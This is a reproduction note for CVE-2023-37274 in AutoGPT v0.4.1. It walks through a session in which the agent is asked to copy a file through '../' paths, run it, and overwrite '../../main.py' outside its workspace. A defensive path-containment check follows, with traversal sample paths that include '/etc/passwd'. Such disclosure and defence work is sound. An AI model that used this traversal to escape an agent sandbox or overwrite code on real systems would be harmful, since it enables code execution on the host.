System - OpenAI - CVE-2023-37274



References:
https://nvd.nist.gov/vuln/detail/CVE-2023-37274
https://github.com/Significant-Gravitas/AutoGPT/security/advisories/GHSA-5h38-mgp9-rj5f

Steps:

$ cd
$ vim test.py
    #!/usr/bin/python3
    print('this is cve test file !')

$ chmod a+x test.py

$ git clone https://github.com/Significant-Gravitas/AutoGPT --recursive
$ cd AutoGPT
$ cp .env.template .env
$ vim .env
    EXECUTE_LOCAL_COMMANDS=True

$ git checkout v0.4.1
$ ./run.py
    I want Auto-GPT to: asisting with copy a file from '../../../test.py' to local

    NEXT ACTION:  COMMAND = execute_shell ARGUMENTS = {'command_line': 'scp user@remote_host:../../../test.py /local/directory/'}
    Input:update command_line as 'cp ../../../test.py ./'

    NEXT ACTION:  COMMAND = execute_shell ARGUMENTS = {'command_line': 'cp ../../../test.py ./'}
    Input:y

    NEXT ACTION:  COMMAND = task_complete ARGUMENTS = {'reason': "The file 'test.py' has been successfully copied from the remote directory to the local system."}
    Input:execute test.py file

    NEXT ACTION:  COMMAND = execute_python_file ARGUMENTS = {'filename': '/home/steward/Downloads/AutoGPT/autogpt/auto_gpt_workspace/test.py'}
    Input:y

    -=-=-=-=-=-=-= COMMAND AUTHORISED BY USER -=-=-=-=-=-=-= 
    SYSTEM:  Command execute_python_file returned: this is cve test file !

$ ./run.py
    I want Auto-GPT to: asisting with copy a file from '../../../test.py' to ../../main.py

    NEXT ACTION:  COMMAND = execute_shell ARGUMENTS = {'command_line': 'cp ../../../test.py ../../main.py'}
    Input:y

    -=-=-=-=-=-=-= COMMAND AUTHORISED BY USER -=-=-=-=-=-=-=
    SYSTEM:  Command execute_shell returned: STDOUT: b'' STDERR: b''

    Input:print ../../main.py
    NEXT ACTION:  COMMAND = execute_shell ARGUMENTS = {'command_line': 'cat ../../main.py'}

    -=-=-=-=-=-=-= COMMAND AUTHORISED BY USER -=-=-=-=-=-=-=
    SYSTEM:  Command execute_shell returned: STDOUT: b"print('this is cve test file !')\n" STDERR: b''
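
The session above ends with relative names such as '../../main.py' being written outside auto_gpt_workspace. The following is an added example, not AutoGPT's code and not part of the original notes: a path-containment check that resolves a requested name against the workspace root and rejects anything that lands outside it. The names resolve_in_workspace, check_all and SAMPLES are hypothetical, and the sample paths are constructed from the ones in the transcript.

```python
from pathlib import Path


class WorkspaceEscape(ValueError):
    """Raised when a requested path resolves outside the workspace root."""


def resolve_in_workspace(workspace: Path, requested: str) -> Path:
    """Return the absolute path for `requested`, or raise if it leaves `workspace`."""
    if "\x00" in requested:
        raise WorkspaceEscape("NUL byte in path")
    root = workspace.resolve()
    # resolve() collapses '..' segments and follows symlinks in existing
    # components. An absolute `requested` replaces `root` in the join, so the
    # containment test below rejects it as well.
    candidate = (root / requested).resolve()
    if candidate != root and root not in candidate.parents:
        raise WorkspaceEscape(f"{requested!r} resolves to {candidate}, outside {root}")
    return candidate


def check_all(workspace: Path, names):
    """Map each requested name to 'allowed' or 'blocked'."""
    verdicts = {}
    for name in names:
        try:
            resolve_in_workspace(workspace, name)
            verdicts[name] = "allowed"
        except WorkspaceEscape:
            verdicts[name] = "blocked"
    return verdicts


# Constructed sample: relative names seen in the transcript plus benign ones.
SAMPLES = [
    "test.py",
    "sub/../test.py",
    "../../main.py",
    "../../../test.py",
    "/etc/passwd",
]

if __name__ == "__main__":
    # Assumed workspace location, for illustration only.
    ws = Path("/tmp/AutoGPT/autogpt/auto_gpt_workspace")
    for name, verdict in check_all(ws, SAMPLES).items():
        print(f"{verdict:8} {name}")
```

A check of this kind covers file-name arguments only; a free-form shell command line, as passed to execute_shell when EXECUTE_LOCAL_COMMANDS=True, is not constrained by it.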